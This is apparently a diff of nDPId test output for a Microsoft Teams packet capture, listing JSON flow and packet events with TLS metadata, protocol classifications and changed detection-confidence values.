{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676435,"flow_last_seen":1587041676449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041676449,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01499{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":64,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041676611} 00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041676592,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676612,"flow_last_seen":1587041676612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676612,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1587041676612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676612,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4fAqAEGKH4JBex2AbukS07pAAAAALAC\/\/+ZfQAAAgQFtAEDAwUBAQgKMISYYwAAAAAEAgAA"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1587041676642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676642,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8LqNAAG0G6+cofgkFwKgBBgG77HaiQxrbpEtO6qASIAC6gQAAAgQFoAEDAwgEAggKVQC94TCEmGM="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1587041676642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676642,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5PAqAEGKH4JBex2AbukS07qokMa3IAQEAn5EwAAAQEICjCEmIFVAL3h"} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676612,"flow_last_seen":1587041676643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041676643,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676612,"flow_last_seen":1587041676643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041676643,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041676612,"flow_last_seen":1587041676675,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1686,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041676675,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677042,"flow_last_seen":1587041677042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677042,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1587041677042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677042,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex3AbvbPWM6AAAAALAC\/\/\/8iwAAAgQFtAEDAwUBAQgKMISaAAAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1587041677088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041677088,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8FwhAAGwGtHI0ck0hwKgBBgG77Hf6fNLR2z1jO6ASIACfvwAAAgQFoAEDAwgEAggKYRMfbzCEmgA="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1587041677088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677088,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex3AbvbPWM7+nzS0oAQEAneQwAAAQEICjCEmixhEx9v"} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677042,"flow_last_seen":1587041677088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041677088,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01501{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":167,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041677042,"flow_last_seen":1587041677186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5981,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041677186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677042,"flow_last_seen":1587041677088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041677088,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01501{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":167,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041677042,"flow_last_seen":1587041677186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5981,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041677186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677243,"flow_last_seen":1587041677243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1587041677243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx4Abt\/TkvVAAAAALAC\/\/\/5uQAAAgQFtAEDAwUBAQgKMISawwAAAAAEAgAA"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1587041677255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677255,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0wUlAAHUGi9Y0ccKEwKgBBgG77Hiki1UTf05L1oAS\/\/8DeQAAAgQFoAEDAwgBAQQC"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1587041677255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677255,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx4Abt\/TkvWpItVFFAQIAAkOAAA"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01172{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01172{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1587041677380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677380,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGPCzAqAEGlZqnW+SlAbsZTPC8DAoX91AUECaMmwAA"} 00184{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":607,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041677408} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":607,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041677401,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} @@ -64,279 +65,284 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1587041678029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041678029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex5Abv0H+uOAAAAALAC\/\/9XkAAAAgQFtAEDAwUBAQgKMISdwwAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1587041678074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041678074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8KlZAAGwGoSQ0ck0hwKgBBgG77Hk7ZXhQ9B\/rj6ASIAAz8QAAAgQFoAEDAwgEAggKYRL\/2zCEncM="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1587041678074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041678074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex5Abv0H+uPO2V4UYAQEAlydQAAAQEICjCEne9hEv\/b"} 